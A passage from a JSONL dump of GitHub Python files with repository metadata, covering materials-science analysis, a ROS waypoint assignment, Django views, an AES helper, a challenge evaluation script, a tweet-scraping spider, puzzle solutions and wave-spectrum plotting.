from_sphere_area=from_sphere_area,\n                e_units=e_units,\n                r_units=r_units,\n                normalize=normalize,\n                scale_per_atom=scale_per_atom,\n            )\n\n        return plt\n\n\ndef sub_chempots(gamma_dict, chempots):\n    \"\"\"\n    Uses dot product of numpy array to sub chemical potentials\n    into the surface grand potential. 
This is much faster\n than using the subs function in sympy.\n\n Args:\n gamma_dict (dict): Surface grand potential equation\n as a coefficient dictionary\n chempots (dict): Dictionary assigning each chemical\n potential (key) in gamma a value\n\n Returns:\n Surface energy as a float\n \"\"\"\n coeffs = [gamma_dict[k] for k in gamma_dict]\n chempot_vals = []\n for k in gamma_dict:\n if k not in chempots:\n chempot_vals.append(k)\n elif k == 1:\n chempot_vals.append(1)\n else:\n chempot_vals.append(chempots[k])\n\n return np.dot(coeffs, chempot_vals)\n","repo_name":"materialsproject/pymatgen","sub_path":"pymatgen/analysis/surface_analysis.py","file_name":"surface_analysis.py","file_ext":"py","file_size_in_byte":80684,"program_lang":"python","lang":"en","doc_type":"code","stars":1185,"dataset":"github-code","pt":"38"} +{"seq_id":"71980589230","text":"import rclpy\nfrom rclpy.node import Node\nfrom custom_interfaces.srv import GetWaypoints, SetWaypoints\nfrom custom_interfaces.msg import Waypoint\nfrom std_srvs.srv import Trigger\nimport json\n\n\nclass WaypointManager(Node):\n def __init__(self):\n super().__init__(\"waypoint_manager\")\n self.get_waypoints_srv = self.create_service(\n GetWaypoints, \"get_robot_waypoints\", self.get_robot_waypoints_callback\n )\n self.set_waypoint_srv = self.create_service(\n SetWaypoints, \"set_waypoints\", self.set_waypoints_callback\n )\n self.reset_waypoint_srv = self.create_service(\n Trigger, \"reset_waypoints\", self.reset_waypoints_callback\n )\n self.robot_inital_geo = (47.740114, 10.322442)\n\n self.waypoint_list_geo = [] # needs to be an array of Waypoint() messages\n self.waypoint_list_robot_frame = []\n self.set_waypoint_client = self.create_client(SetWaypoints, \"set_waypoints\")\n\n def set_waypoints_callback(self, request, response):\n response.success = False\n self.get_logger().info(f\"Task 1: Loaded waypoints: {self.waypoint_list_geo}\")\n # COMPLETE YOUR CODE HERE\n response.success = True\n\n return response\n\n def convert_waypoints_to_robot_frame(self):\n # COMPLETE YOUR CODE HERE\n self.get_logger().info(\n f\" Task 2: Waypoints in robot frame: {self.waypoint_list_robot_frame}\"\n )\n\n pass\n\n def plot_waypoints(self):\n self.get_logger().info(\n f\" Task 3: Plot and save a graph of loaded waypoints in robot coordinate frame (png)\"\n )\n # COMPLETE YOUR CODE HERE\n pass\n\n def get_robot_waypoints_callback(self, request, response):\n response.waypoints = self.waypoint_list_geo\n\n return response\n\n def reset_waypoints_callback(self, request, response):\n response.waypoints = []\n\n return response\n\n def call_set_waypoints_geo(self, request):\n self.future = self.set_waypoint_client.call_async(request)\n rclpy.spin_until_future_complete(self, self.future)\n return self.future.result()\n\n\ndef main(args=None):\n rclpy.init(args=args)\n\n waypoint_manager = WaypointManager()\n\n set_waypoints_msg = SetWaypoints.Request()\n set_waypoints_msg.file_path = \"/your_path/waypoints.geojson\"\n response = waypoint_manager.call_set_waypoints_geo(set_waypoints_msg)\n if response.success == True:\n waypoint_manager.convert_waypoints_to_robot_frame()\n waypoint_manager.plot_waypoints()\n else:\n print(\"No waypoints loaded\")\n\n rclpy.spin(waypoint_manager)\n\n rclpy.shutdown()\n\n\nif __name__ == \"__main__\":\n 
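# A hedged sketch (assumed, not part of the original assignment skeleton) of how\n    # Task 2's convert_waypoints_to_robot_frame could map each (lat, lon) waypoint\n    # into metres around self.robot_inital_geo via an equirectangular approximation:\n    #   R = 6371000.0  # mean Earth radius [m]; would also need: import math\n    #   lat0, lon0 = map(math.radians, self.robot_inital_geo)\n    #   x = R * (math.radians(lon) - lon0) * math.cos(lat0)\n    #   y = R * (math.radians(lat) - lat0)\n    # The call below simply runs the entry point defined above.\n    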
main()\n","repo_name":"Paltech-GmbH/paltech_assignment","sub_path":"paltech_assignment/paltech_assignment/waypoint_manager.py","file_name":"waypoint_manager.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21761119043","text":"from django.shortcuts import render\nfrom Database.models import Course, CourseUsedRecord, Customer\nimport datetime\nfrom Tools.SessionManager import SessionManager\nfrom django.contrib import messages\ndef CourseUsed(request):\n '''全面更换form'''\n username_app = Course.objects.all()\n if request.method == 'POST':\n if request.POST.get('Submit'): # 如果是Submit传来的请求\n username = request.POST.get('vipname')\n course_name = request.POST.get('coursename')\n if course_name == 'all':\n if username == 'all':\n user_list = CourseUsedRecord.objects.all()\n used_times = 0\n else:\n user_list = CourseUsedRecord.objects.filter(username=username)\n used_times = 0\n else:\n if username == 'all':\n user_list = CourseUsedRecord.objects.filter(coursename=course_name)\n used_times = 0\n else:\n user_list = CourseUsedRecord.objects.filter(username=username, coursename=course_name)\n used_times = CourseUsedRecord.objects.filter(username=username, coursename=course_name).count()\n else:\n if request.POST.get('newlyRecord'): # 如果是newlyRecord传来的请求\n username = request.POST.get('vipname')\n course_name = request.POST.get('coursename')\n '''因为username就是主键,所以修正这个写法为get,默认返回值设置为None,后面判断是不是none即可'''\n flags = Customer.objects.filter(username=username).exists()\n if username == '' or username == 'all' or course_name == '' or course_name == 'all' or flags == False: # 用户名为空\n messages.warning(request, \"输入错误!\")\n return render(request, 'CourseUsed.html', locals()) # 跳转\n else: # 在username,course_name新建一条数据库记录,自动生成一个id作为主键\n '''使用递增数字作为主键,时间作为新字段属性'''\n new_number = 1\n CourseUsedRecord.objects.create(number=new_number, username=username, coursename=course_name)\n return render(request, 'CourseUsed.html', locals())\n return render(request, 'CourseUsed.html', locals())\n\n\ndef moremessage_username(request, username):\n user_list = CourseUsedRecord.objects.filter(username=username)\n return render(request, 'CourseOpt.html', locals())\n\n\ndef moremessage_coursename(request, coursename):\n user_list = CourseUsedRecord.objects.filter(coursename=coursename)\n return render(request, 'UserCourseUsedRecord.html', locals())\n\n\ndef UserCourseUsed(request):\n sessionManager=SessionManager(request)\n username=sessionManager.getUsername()\n if request.method == 'POST':\n coursename = request.POST.get('coursename')\n if coursename == 'all':\n user_list = CourseUsedRecord.objects.filter(username=username)\n used_times = 0\n else:\n user_list = CourseUsedRecord.objects.filter(username=username, coursename=coursename)\n used_times = CourseUsedRecord.objects.filter(username=username, coursename=coursename).count()\n return render(request, 'UserCourseUsedRecord.html', locals())\n","repo_name":"shao0099876/AmyYoga","sub_path":"AmyYoga/AmyYoga/CourseUsed/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"42894353468","text":"import os, re, display, packages, config\n\nos.system(\"clear\")\ndef menu():\n #default menu\n display.banner()\n display.sep()\nmenu()\noption = input(\"user@holy-grail-installer> \")\n\nwhile option != 0:\n if option == \"0\":\n #null\n print()\n elif 
option == \"exit\":\n #close program\n print(\"Goodbye\")\n exit()\n elif option == 'ls':\n #listing commands\n display.sep()\n display.commands()\n elif option == 'greeks install' or option == '1':\n packages.greeks_install()\n config.greek_grub_config()\n config.greeks_bashrc()\n config.greeks_qemu_config()\n config.greeks_script_setup()\n elif option == '2' or option == 'auto setup':\n print(\"Invalid option please download https://github.com/cronos-hash/auto_gpu_passthrough\")\n elif option == \"clear\" or \"3\":\n #clear terminal option\n display.clear()\n elif option == \"exit\":\n #close program\n print(\"Goodbye!\")\n quit()\n exit()\n sys.exit()\n else:\n print(\"Not a command\")\n print()\n #user bar\n option = input(\"user@holy-grail-installer> \")\n","repo_name":"Z16Z4/myconf","sub_path":"python_version/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"24342806284","text":"# -*- coding: utf-8 -*-\n\nfrom Crypto.Cipher import AES\nimport Crypto.Random\nimport binascii\nimport sys\n\nBS = AES.block_size\npad = lambda x: x + (BS - len(x) % BS) * chr(BS - len(x) % BS).encode(\"ascii\")\n\nif sys.version_info[0] == 2:\n\tunpad = lambda s : s[0:-ord(s[-1])]\nelse:\n\tunpad = lambda s : s[0:-s[-1]]\n\nclass AESCipher:\n\tdef __init__( self, key ):\n\t\t\"\"\"\n\t\tRequires hex encoded param as a key\n\t\t\"\"\"\n\t\tself.key = binascii.a2b_hex(key)\n\n\tdef encrypt( self, raw ):\n\t\t\"\"\"\n\t\tReturns hex encoded encrypted value!\n\t\t\"\"\"\n\t\traw = pad(raw)\n\t\tiv = Crypto.Random.new().read(AES.block_size);\n\t\tcipher = AES.new( self.key, AES.MODE_CBC, iv )\n#\t\treturn binascii.b2a_hex( iv + cipher.encrypt( raw ) )\n\t\treturn iv + cipher.encrypt( raw )\n\n\tdef decrypt( self, enc, iv=None ):\n\t\t\"\"\"\n\t\tRequires hex encoded param to decrypt\n\t\t\"\"\"\n\t\tif iv == None:\n\t\t\tiv = enc[:16]\n\t\t\tenc= enc[16:]\n\n\t\tcipher = AES.new(self.key, AES.MODE_CBC, iv )\n\t\treturn unpad(cipher.decrypt( enc))\n","repo_name":"005jon/plugin.video.antiktv","sub_path":"AESCipher.py","file_name":"AESCipher.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"6046157966","text":"# coding=utf-8\nimport json\nimport sys\nimport os\nimport string\nimport numpy as np\nimport time\nimport glob\nimport zipfile\nimport shutil\n\n\ndef glob_matching(fn, fmt):\n matched_fns = list(glob.iglob('submit/**/submission.csv', recursive=True))\n if len(matched_fns) == 0:\n raise Exception(\"You submitted a {} file, but we didn't find submission.csv in it. Please check your submission.\".format(fmt))\n if len(matched_fns) > 1:\n raise Exception(\"You submitted a {} file, but there are more than one files named submission.csv in it. Please check your submission.\".format(fmt))\n return matched_fns[0]\n\n\ndef read_submission(submit_path, reference, k=5):\n # check whether the path of submitted file exists\n if not os.path.exists(submit_path):\n raise Exception(\"The submission file is not found!\")\n\n # evaluate a zip file\n if os.path.isdir(\"submit\"):\n shutil.rmtree(\"submit\")\n if submit_path.endswith('.zip'):\n try:\n with zipfile.ZipFile(submit_path, \"r\") as zip_data:\n zip_data.extractall(\"submit\")\n zip_data.close()\n except:\n raise Exception('The submitted zip file is corrputed! 
Please check your submission.')\n        real_submit_path = glob_matching('submission.csv', 'zip')\n    # evaluate a csv file\n    else:\n        real_submit_path = submit_path\n\n    submission_dict = {}\n    ref_qids = set(reference.keys())\n\n    with open(real_submit_path) as fin:\n        for line in fin:\n            line = line.strip()\n            records = [elem.strip() for elem in line.split(',')]\n            if records[0] not in ref_qids:\n                continue\n            qid = records[0]\n            # check whether there are K products for each query\n            if len(records[1:]) != k:\n                raise Exception('Query-id {} has wrong number of predicted product-ids! Require {}, but {} found.'.format(qid, k, len(records[1:])))\n            # check whether there exists an empty prediction for any query\n            if any([len(r) == 0 for r in records[1:]]):\n                raise Exception('Query-id {} has an empty prediction at rank {}! Please check again!'.format(qid, records[1:].index(\"\") + 1)) \n            # check whether there exists an invalid prediction for any query\n            for rank, r in enumerate(records[1:]):\n                if not all([char in string.digits for char in r]):\n                    raise Exception('Query-id {} has an invalid prediction product-id \\\"{}\\\" at rank {}'.format(qid, r, rank + 1))\n            # check whether there are duplicate predicted products for a single query\n            if len(set(records[1:])) != k:\n                raise Exception('Query-id {} has duplicate products in your prediction. Please check again!'.format(qid))\n            submission_dict[qid] = records[1:] # here we save the list of string\n    \n    # check if any query is missing in the submission\n    pred_qids = set(submission_dict.keys())\n    nopred_qids = ref_qids - pred_qids\n    if len(nopred_qids) != 0:\n        raise Exception('The following query-ids have no prediction in your submission, please check again: {}'.format(\", \".join(nopred_qids)))\n\n    return submission_dict\n    \n\n# compute dcg@k for a single sample\ndef dcg_at_k(r, k):\n    r = np.asfarray(r)[:k]\n    if r.size:\n        return r[0] + np.sum(r[1:] / np.log2(np.arange(3, r.size + 2)))\n    return 0.\n\n\n# compute ndcg@k (dcg@k / idcg@k) for a single sample\ndef get_ndcg(r, ref, k):\n    dcg_max = dcg_at_k(ref, k)\n    if not dcg_max:\n        return 0.\n    dcg = dcg_at_k(r, k)\n    return dcg / dcg_max\n\n\ndef dump_2_json(info, path):\n    with open(path, 'w') as output_json_file:\n        json.dump(info, output_json_file)\n\n\ndef report_error_msg(detail, showMsg, out_p):\n    error_dict=dict()\n    error_dict['errorDetail']=detail\n    error_dict['errorMsg']=showMsg\n    error_dict['score']=0\n    error_dict['scoreJson']={}\n    error_dict['success']=False\n    dump_2_json(error_dict,out_p)\n\n\ndef report_score(score, out_p):\n    result = dict()\n    result['success']=True\n    result['score'] = score\n    result['scoreJson'] = {'score': score}\n    dump_2_json(result,out_p)\n\n\nif __name__==\"__main__\":\n    # the path of answer json file (e.g. 
valid_answer.json)\n    standard_path = sys.argv[1]\n    # the path of prediction file (csv or zip)\n    submit_path = sys.argv[2]\n    # the score will be dumped into this output json file\n    out_path = sys.argv[3]\n\n    print(\"Read standard from %s\" % standard_path)\n    print(\"Read user submit file from %s\" % submit_path)\n\n    try:\n        # read ground-truth\n        reference = json.load(open(standard_path))\n        \n        # read predictions\n        k = 5\n        predictions = read_submission(submit_path, reference, k)\n\n        # compute score for each query\n        score_sum = 0.\n        for qid in reference.keys():\n            ground_truth_ids = set([str(pid) for pid in reference[qid]])\n            ref_vec = [1.0] * len(ground_truth_ids)\n            pred_vec = [1.0 if pid in ground_truth_ids else 0.0 for pid in predictions[qid]]\n            score_sum += get_ndcg(pred_vec, ref_vec, k)\n        # the higher score, the better\n        score = score_sum / len(reference)\n        report_score(score, out_path)\n        print(\"The evaluation finished successfully.\")\n    except Exception as e:\n        report_error_msg(e.args[0], e.args[0], out_path)\n        print(\"The evaluation failed: {}\".format(e.args[0]))","repo_name":"Ai-Light/KDD2020Multimodalities","sub_path":"code/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":5469,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"38"}{"seq_id":"42602679520","text":"n=int(input()) # number of ropes\nrope = [] # list of rope lengths\ndiction = {} # count of ropes per length\nfor _ in range(n):\n    rope.append(int(input()))\n\nrope.sort()\n\nfor i in rope:\n    if i in diction:\n        diction[i] = diction[i] +1\n    else:\n        diction[i] = 1\nsumarr = []\nlength = len(rope)\nfor j in diction:\n    sumarr.append(j*length)\n    length = length - diction[j]\nsumarr.sort()\nprint(sumarr[-1])","repo_name":"kimss373/solvealgorithm","sub_path":"백준/실버4/2217번_로프.py","file_name":"2217번_로프.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}{"seq_id":"74530777069","text":"import json\nfrom scrapy import Spider\n\n\nclass TweetsSpider(Spider):\n    name = 'tweets'\n    allowed_domains = ['trumptwitterarchive.com']\n    start_urls = ['http://www.trumptwitterarchive.com/data/realdonaldtrump/2020.json',]\n\n    def parse(self, response):\n        responsejson = json.loads(response.body)\n\n        for tweet in responsejson:\n            yield {'source': tweet['source'],\n                   'id_str': tweet['id_str'],\n                   'text': tweet['text'],\n                   'created_at': tweet['created_at'],\n                   'retweet_count': tweet['retweet_count'],\n                   'in_reply_to_user_id_str': tweet['in_reply_to_user_id_str'],\n                   'favorite_count': tweet['favorite_count'],\n                   'is_retweet': tweet['is_retweet']}\n\n","repo_name":"inu847/Scraping_modul","sub_path":"tweettrump_json_spider/tweettrump_json_spider/spiders/tweets.py","file_name":"tweets.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}{"seq_id":"28480569574","text":"def one_diff(nums):\n    s = sorted(set(nums)) #list of unique nums in sorted order\n    v = [nums.count(s[i]) + nums.count(s[i]+1) for i in range(len(s))]\n    #for every element in the sorted, deduplicated array, count the repeats of that value and add the repeats of that value + 1; only a value paired with value + 1 keeps all pairwise differences <= 1. return the max occurrences\n    return max(v)\n\nnums = [12,4,1,3,4,5,5,5,8,10,10,10]\nz = one_diff(nums)\nprint(z)\n\n\n\n\n\n\n\n\n\n\n\n# def one_diff(n,nums):\n# #check diff of every value. 
if <= 1, push to less_ones array.\n# #return length of less_ones array\n# less_ones = []\n# for f in nums:\n# for s in nums:\n# # print(abs(f-s))\n# if f == s:\n# continue\n# else:\n# if (abs(f-s) <= 1):\n# less_ones.append(f)\n# less_ones.append(s)\n# # less_ones.add(s)\n# print(less_ones)\n# return len(less_ones)\n\n# nums = [1,2,4,8,10,11,12,13,14,18,22,25,12]\n# x = one_diff(len(nums),nums)\n# print(x)\n\n# \n\n# x=sorted(set(a))\n# return max([a.count(x[i])+a.count(x[i]+1) for i in range(len(x))]+[2])\n\n# nums = [12,4,1,3,4,5,5,5,8,10,10,10]\n# pn = pick_nums(len(nums),nums)\n# print(pn)\n\n# arr = [1,2,3]\n# range(len(arr))","repo_name":"ayunas/hacker-rank","sub_path":"one_diff.py","file_name":"one_diff.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"31644074068","text":"\"\"\"\nDate: 12/20/2020\nName: Rio Weil\nTitle: day6.py\nDecription: 2020 AoC D6 - Counting and common letters in lists of strings\n\"\"\"\nimport numpy as np\n\n## Functions:\ndef group_answers(input_lines):\n \"\"\"\n Organizes input so that answers are grouped together into sublists.\n \"\"\"\n group_sublists = []\n current_sublist = []\n for answer in input_lines:\n if answer == '':\n group_sublists.append(current_sublist)\n current_sublist = []\n else:\n current_sublist.append(answer)\n group_sublists.append(current_sublist) # For the last group\n return group_sublists\n\nalphabet = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \n\"m\", \"n\", \"o\", \"p\", \"q\", \"r\", \"s\", \"t\", \"u\", \"v\", \"w\", \"x\", \"y\", \"z\"]\n\ndef count_all_letters(low):\n \"\"\"\n Returns count of all unique letters in a list of words\n \"\"\"\n joined_word = \"\".join(elem for elem in low)\n counter = 0\n for letter in alphabet:\n if letter in joined_word:\n counter = counter + 1\n return counter\n\n\ndef count_matching_letters(low):\n \"\"\"\n Returns the count of letters common to all words in a list of words.\n \"\"\"\n letters_to_check = []\n firstw = low[0]\n counter = 0\n for i in range(len(firstw)):\n letters_to_check.append(firstw[i:i+1])\n for letter in letters_to_check:\n f = lambda word: letter in word\n if all(f(x) for x in low):\n counter = counter + 1\n return counter\n\n\n## Solution:\n\nlines = open('input.txt', \"r\").read().splitlines()\nsorted_groups = group_answers(lines)\n\nsol1 = 0\nsol2 = 0\nfor group in sorted_groups:\n sol1 = count_all_letters(group) + sol1\n sol2 = count_matching_letters(group) + sol2","repo_name":"RioWeil/aoc-2020","sub_path":"Day6/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"13226628766","text":"import numpy as np\nimport netCDF4 as nc\nimport datetime as dt\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport matplotlib.dates as mdates\nimport matplotlib.colors as mcolors\nimport locale\nimport os\n#\nfrom matplotlib.colors import LogNorm, LinearSegmentedColormap\n#\n# import wdm\nimport src.processing.motion_correction as motcor\nfrom src.processing.wdm.spectra import polar_spectrum, colorax\nfrom src.processing.processing_data import (\n ProcessingData, eddy_correlation_flux, nanmean, stokes_drift\n )\n#\nplt.ion()\nnp.warnings.filterwarnings('ignore')\nlocale.setlocale(locale.LC_TIME, \"es_ES\")\n\n\n# main class {{{\nclass PlotSpectra(object):\n\n \"\"\"Class to 
create a cool animation of the wave spectra\"\"\"\n\n def __init__(self, metafile, t_ini, t_end, number_of_minutes=30):\n \"\"\"Initialize the class\"\"\"\n\n # perform the data processing\n self.metafile = metafile\n self.p = ProcessingData(self.metafile, number_of_minutes)\n self.metadata = self.p.metadata\n\n # load netcdf file\n # TODO: extrat filename from METAFILE\n bomm_name = self.metadata[\"name\"]\n nm = int(number_of_minutes)\n filename = f\"{bomm_name}/level2/{bomm_name}_level2_{nm}min.nc\" \n self.filename = self.metadata[\"basepath\"] + filename\n dataset = nc.Dataset(self.filename, \"r\")\n\n # load time and fine coincident dates\n time = nc.num2date(dataset[\"time\"][:], dataset[\"time\"].units)\n i, j = np.argmin(abs(time - t_ini)), np.argmin(abs(time - t_end))\n self.time = time[i:j]\n\n # bomm title\n self.title = dataset.title[:10].strip()\n \n # directional spectra\n self.wfrq = dataset[\"wfrq\"][:]\n self.dirs = dataset[\"dirs\"][:]\n self.E = dataset[\"E\"][i:j,:]\n self.Hs = dataset[\"Hm0\"][i:j]\n self.Tp = dataset[\"Tp\"][i:j]\n\n # stokes drift\n dirr = np.radians(self.dirs)\n Ex = np.trapz(np.cos(dirr[None,:,None]) * self.E, x=dirr, axis=1)\n Ey = np.trapz(np.sin(dirr[None,:,None]) * self.E, x=dirr, axis=1)\n self.Us = self.stokes_drift(self.wfrq, Ex, z=0)\n self.Vs = self.stokes_drift(self.wfrq, Ey, z=0)\n\n # sonic anemometer\n self.Ua = dataset[\"Ua\"][i:j]\n self.Va = dataset[\"Va\"][i:j]\n self.ustar = dataset[\"ustar\"][i:j]\n \n # yaw and maximet data\n self.yaw = dataset['yaw'][i:j]\n self.Wspd = dataset[\"U10N\"][i:j]\n self.tWdir = (270 - dataset[\"tWdir\"][i:j]) % 360\n self.aWdir = np.arctan2(self.Va, self.Ua) * 180/np.pi\n\n # wind stress \n angle = -np.radians(self.aWdir)\n taux = -dataset[\"rhoa\"][i:j] * dataset[\"uw\"][i:j]\n tauy = -dataset[\"rhoa\"][i:j] * dataset[\"vw\"][i:j]\n self.Tx = taux * np.cos(angle) + tauy * np.sin(angle)\n self.Ty = -taux * np.sin(angle) + tauy * np.cos(angle)\n\n # drag coefficient\n self.CD = dataset[\"ustar\"][i:j]**2 / self.Wspd**2\n self.zL = dataset[\"zL\"][i:j]\n\n # do some conversions\n self.Uy = np.cos((self.yaw + 90) * np.pi/180)\n self.Vy = np.sin((self.yaw + 90) * np.pi/180)\n self.Um = self.Wspd * np.cos(self.tWdir * np.pi/180)\n self.Vm = self.Wspd * np.sin(self.tWdir * np.pi/180)\n\n # creat folder to store figures\n t_ini_str = t_ini.strftime('%Y%m%d')\n t_end_str = t_end.strftime('%Y%m%d')\n # TODO: choose anoher path to store animation\n self.folder = f\"./animation_{bomm_name}_{t_ini_str}_{t_end_str}/\"\n\n\n def remove_outliers(self, x):\n \"\"\"Recursively remove outliers from a give signal\"\"\"\n\n # compute mean and standar deviation\n xmean, xstd = nanmean(x), np.nanstd(x)\n\n # first remove values lying 5 time std\n x_clean = x.copy()\n x_clean[abs(x - xmean) > 5*xstd] = np.nan\n\n return x_clean\n\n\n def get_high_frequency_data(self, i):\n \"\"\"Get first level data corresponding to the same date\"\"\"\n\n # detrend function\n detrend = lambda x: x - nanmean(x)\n\n date = self.time[i]\n self.p.run(date)\n self.t_wind = np.arange(0, len(self.p.wnd[\"time\"])) / 60 / 100\n self.u_wind = self.remove_outliers(self.p.U_cor[0])\n self.v_wind = self.remove_outliers(self.p.U_cor[1])\n self.w_wind = self.remove_outliers(self.p.U_cor[2])\n #\n self.t_wave = np.arange(0, len(self.p.wav[\"time\"])) / 60 / 20\n self.Z = self.p.Z\n\n \n def set_limits(self, x, ax):\n \"\"\"Set the limit of the axes.\"\"\"\n\n xmin, xmax = np.floor(np.nanmin(x)), np.ceil(np.nanmax(x))\n ax.set_ylim((xmin, xmax))\n\n \n 
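# The method below evaluates the deep-water surface Stokes drift,\n    #   u_s(z) = (2/g) * integral( w**3 * Sw(w) * exp(2*k*z) dw ),  with k = w**2/g\n    # and Sw(w) = S(f)/(2*pi); as in the code, the integral is truncated to the\n    # first 80 frequency bins.\n    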
def stokes_drift(self, f, S, z=0):\n \"\"\"Compute stokes drift profile as Breivik et al 2016 eq5.\"\"\"\n \n # angular frequency and spectrum in right units\n g = 9.8\n w = 2*np.pi * f\n k = w**2 / g\n Sw = S / (2*np.pi)\n \n fac = 2 / g\n dummy = w**3 * Sw * np.exp(2*k*z)\n return np.trapz(fac*dummy[:,:80], w[:80], axis=1)\n\n \n def plot_wave_spectrum(self, i, ax):\n \"\"\"Make a plot of the wave spectrum for the given i index.\"\"\"\n\n polar_spectrum(self.wfrq, self.dirs, self.E[i,:,:],\n label=True, smin=-3., smax=2, fmax=0.5, ax=ax, cbar=True)\n #\n # plot_arrows\n qva = ax.quiver(0, 0, self.Ua[i], self.Va[i], scale=30, color=\"steelblue\")\n qvt = ax.quiver(0, 0, self.Tx[i], self.Ty[i], scale=0.5, color=\"darkblue\")\n qvs = ax.quiver(0, 0, self.Us[i], self.Vs[i], scale=0.3, color=\"darkred\")\n qvy = ax.quiver(0, 0, self.Uy[i], self.Vy[i], scale=1, color=\"gold\", headwidth=0)\n\n ax.quiverkey(qva, 0.10, -0.08, 5.00, label=\"$U_{10} = 5\\,\\mathrm{m/s}$\")\n ax.quiverkey(qvs, 0.38, -0.08, 0.05, label=\"$U_s = 5\\,\\mathrm{cm/s}$\")\n ax.quiverkey(qvt, 0.66, -0.08, 0.10, label=\"$\\\\tau = 0.1\\,\\mathrm{N/m^2}$\")\n ax.quiverkey(qvy, 0.94, -0.08, 0.20, label=\"$\\psi$\")\n\n # plot wind-sea / swell delimiter\n wdirs = np.radians((self.dirs - self.tWdir[i]))\n fcut = 0.83 * 9.8 / (2 * np.pi * self.Wspd[i] * np.cos(wdirs)**1)\n # fcut[abs(wdirs)>=np.pi/3] = np.nan\n fcutx = fcut * np.cos(self.dirs*np.pi/180)\n fcuty = fcut * np.sin(self.dirs*np.pi/180)\n ax.plot(fcutx, fcuty, lw=0.5, ls=\"-\", color=\"0.5\")\n\n # TODO:\n # - add Ustar and Ustokes\n\n # # set wind label\n ulabel = f\"$U_{{10}} = {self.Wspd[i]:.2f}$ m/s\\n\" + \\\n f\"$\\\\theta_{{u}} = {self.tWdir[i]:.2f}^\\circ$\"\n ax.text(0.01, 0.98, ulabel, transform=ax.transAxes, ha=\"left\", va=\"top\")\n \n title = self.time[i].strftime(\"%Y-%m-%d %H:%M:%S\")\n ax.set_title(title)\n\n # remove lower labels\n ax.set_xlabel('')\n ax.set_xticklabels('')\n\n\n def make_plot(self, i):\n \"\"\"Start the figure and plot permanent data\"\"\"\n\n # create canvas\n fig = plt.figure(figsize=(10,8))\n #\n ax0 = fig.add_axes([0.05, 0.50, 0.42, 0.45])\n ax1 = fig.add_axes([0.55, 0.82, 0.40, 0.13])\n ax2 = fig.add_axes([0.55, 0.66, 0.40, 0.13])\n ax3 = fig.add_axes([0.55, 0.50, 0.40, 0.13])\n #\n bx1 = fig.add_axes([0.05, 0.33, 0.90, 0.10])\n bx2 = fig.add_axes([0.05, 0.23, 0.90, 0.10])\n bx3 = fig.add_axes([0.05, 0.13, 0.90, 0.10])\n #\n cx0 = fig.add_axes([0.05, 0.03, 0.90, 0.10])\n\n\n ax1.set_title(self.title)\n ax1.plot(self.time, self.Wspd, c=\"k\")\n ax2.plot(self.time, self.Hs, c=\"k\")\n ax3.plot(self.time, self.Tp, c=\"k\")\n #\n ax1.set_ylabel(\"$U_{10}\\,\\mathrm{[m/s]}$\")\n ax2.set_ylabel(\"$H_{m0}\\,\\mathrm{[m]}$\")\n ax3.set_ylabel(\"$T_{p}\\,\\mathrm{[s]}$\")\n #\n self.set_limits(self.Wspd, ax1)\n self.set_limits(self.Hs, ax2)\n self.set_limits(self.Tp, ax3)\n #\n for ax in (ax1, ax2, ax3):\n ax.yaxis.tick_right()\n ax.yaxis.set_major_locator(plt.MaxNLocator(4))\n ax.yaxis.set_label_position(\"right\")\n ax.yaxis.set_ticks_position(\"both\")\n ax.xaxis.set_minor_locator(mdates.HourLocator(range(0,24,3)))\n ax.xaxis.set_major_locator(mdates.DayLocator(interval=1))\n ax.xaxis.set_major_formatter(mdates.DateFormatter(\"%b %d\\n%Y\"))\n\n\n ax1.set_xticklabels([''])\n ax2.set_xticklabels([''])\n # \n # plot high frequency data\n try:\n self.get_high_frequency_data(i)\n # \n bx1.plot(self.t_wind, self.u_wind, color=\"0.9\")\n bx2.plot(self.t_wind, self.v_wind, color=\"0.9\")\n bx3.plot(self.t_wind, self.w_wind, 
color=\"0.9\")\n # bx1.set_ylim((-20,20))\n # bx2.set_ylim((-20,20))\n # bx3.set_ylim((-5,5))\n #\n n_smooth = 200\n bx1.plot(self.t_wind[::n_smooth], self.u_wind[::n_smooth])\n bx2.plot(self.t_wind[::n_smooth], self.v_wind[::n_smooth])\n bx3.plot(self.t_wind[::n_smooth], self.w_wind[::n_smooth])\n #\n bx1.set_ylabel(\"$u\\,\\mathrm{[m/s]}$\")\n bx2.set_ylabel(\"$v\\,\\mathrm{[m/s]}$\")\n bx3.set_ylabel(\"$w\\,\\mathrm{[m/s]}$\")\n #\n cx0.plot(self.t_wave, self.Z[:,self.p.valid_wires_index])\n cx0.legend(self.p.valid_wires, loc=0, ncol=6)\n cx0.set_ylabel(\"$\\\\eta\\,\\mathrm{[m]}$\")\n # cx0.set_ylim((-2,2))\n #\n for ax in (bx1, bx2, bx3, cx0):\n ax.yaxis.set_label_position(\"right\")\n\n except:\n pass\n\n # plot wave spectrum\n self.plot_wave_spectrum(i, ax0)\n point1, = ax1.plot(self.time[i], self.Wspd[i], \"oy\", ms=3)\n point2, = ax2.plot(self.time[i], self.Hs[i], \"oy\", ms=3)\n point3, = ax3.plot(self.time[i], self.Tp[i], \"oy\", ms=3)\n\n\n return fig, ax0, ax1, ax2, ax3\n\n\n def animate(self):\n 